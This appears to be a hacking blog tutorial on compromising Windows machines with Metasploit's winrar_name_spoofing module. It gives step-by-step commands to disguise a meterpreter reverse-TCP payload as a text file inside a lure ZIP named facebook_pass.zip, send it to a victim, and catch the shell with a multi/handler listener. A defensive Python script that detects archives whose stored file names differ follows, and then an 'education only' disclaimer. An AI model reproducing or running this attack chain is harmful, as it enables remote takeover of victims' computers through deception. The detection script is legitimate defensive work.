Hello folks, in this post I'll explain how you can hack a Windows system using a text file and the Metasploit Framework. This trick uses the winrar_name_spoofing vulnerability. Using this vulnerability we can create a ZIP file in which the payload file appears as a .txt file. Whenever a victim opens that text file, a meterpreter session will be established on the attacker's side. So let's start the tutorial.
Requirements
For a better understanding of this tutorial, please read this post first.
What Are We Covering Today?
1. We will generate a payload in ZIP format using the Metasploit Framework.
2. After that, we will create a listener for that payload.
3. Finally, we will exploit the victim's system.
Steps to create a Payload using Metasploit Framework
Step 1: Open the terminal and launch the Metasploit Framework using the following command:
msfconsole
Step 2: Once you are in msfconsole, type the following command to use the winrar_name_spoofing module:
use exploit/windows/fileformat/winrar_name_spoofing
Step 3: Now type the following command to show the available options that can be used to generate the payload:
show options
In the output of show options, there are two options we have to set. The first one is FILENAME, which will be in .zip format, and the second one is SPOOF, which will be in .txt format.
Step 4: Now we have to set the name of the file and the name of the spoofed file that will be inside the ZIP file. To do that, execute the following commands one by one:
set FILENAME facebook_pass.zip
set SPOOF pass.txt
Step 5: In this step, we need to set LHOST and LPORT. Since I'm using it on my local network, I'll put my local IP address as LHOST and 4444 as LPORT. Execute the following commands one by one:
set LHOST 192.168.0.104
set LPORT 4444
Step 6: Now we need to set the payload. To do that, execute the following command in the terminal:
set payload windows/meterpreter/reverse_tcp
Now type exploit, and a file named facebook_pass.zip will be created at /root/.msf4/local/facebook_pass.zip. Copy the file and send it to the victim by any method you want.
Steps to create a Listener for the Payload
In this step, we will create a listener for our Payload. This process is the same as we have done in our Android hacking post.
Step 1: Type the following command to use multi/handler:
use exploit/multi/handler
Step 2: Now we need to set the payload. To do that, execute the following command:
set payload windows/meterpreter/reverse_tcp
Step 3: Now set the LHOST and LPORT for the listener. Type the following commands one by one:
set LHOST 192.168.0.104
set LPORT 4444
Step 4: Now type exploit in the terminal, and your exploit will run:
exploit
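For defenders, a check for archives of this kind, added here as an example (it is not code from this post or from Metasploit): the winrar_name_spoofing module depends on WinRAR listing an entry under the name stored in the ZIP central directory while opening it under the name stored in the entry's local file header, so any archive where those two names differ can be flagged before a user opens it. The function name find_name_mismatches is hypothetical, and Zip64 and multi-disk archives are assumed not to occur.

```python
import struct
import sys

EOCD_SIG = b"PK\x05\x06"  # end of central directory record
CDIR_SIG = b"PK\x01\x02"  # central directory file header
LFH_SIG = b"PK\x03\x04"   # local file header


def find_name_mismatches(data: bytes):
    """Return [(central_directory_name, local_header_name)] for every entry
    whose two stored names differ. Assumes no Zip64 and a single disk."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0 or eocd + 22 > len(data):
        raise ValueError("no end-of-central-directory record found")
    # total entry count, central directory size, central directory offset
    total, _size, pos = struct.unpack_from("<HII", data, eocd + 10)
    findings = []
    for _ in range(total):
        if data[pos:pos + 4] != CDIR_SIG:
            raise ValueError("bad central directory header at %d" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        (lfh_off,) = struct.unpack_from("<I", data, pos + 42)
        central = data[pos + 46:pos + 46 + name_len]
        pos += 46 + name_len + extra_len + comment_len
        if data[lfh_off:lfh_off + 4] != LFH_SIG:
            raise ValueError("bad local file header at %d" % lfh_off)
        (local_len,) = struct.unpack_from("<H", data, lfh_off + 26)
        local = data[lfh_off + 30:lfh_off + 30 + local_len]
        if local != central:
            # A legitimate archiver writes the same name in both places.
            findings.append((central.decode("cp437"), local.decode("cp437")))
    return findings


if __name__ == "__main__":
    # Usage: python zip_name_check.py suspicious.zip [more.zip ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for shown, real in find_name_mismatches(fh.read()):
                print(f"{path}: listed as {shown!r}, local header says {real!r}")
```

A mail gateway or download scanner can quarantine any archive for which this returns a non-empty list. Updating WinRAR also helps, since the inconsistency was reported against older releases.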
Disclaimer: My dear visitors, this article is only for the sake of education. Please do not misuse the guide given here, as this may lead to action being taken against you. If this happens, this blog will not be responsible for that.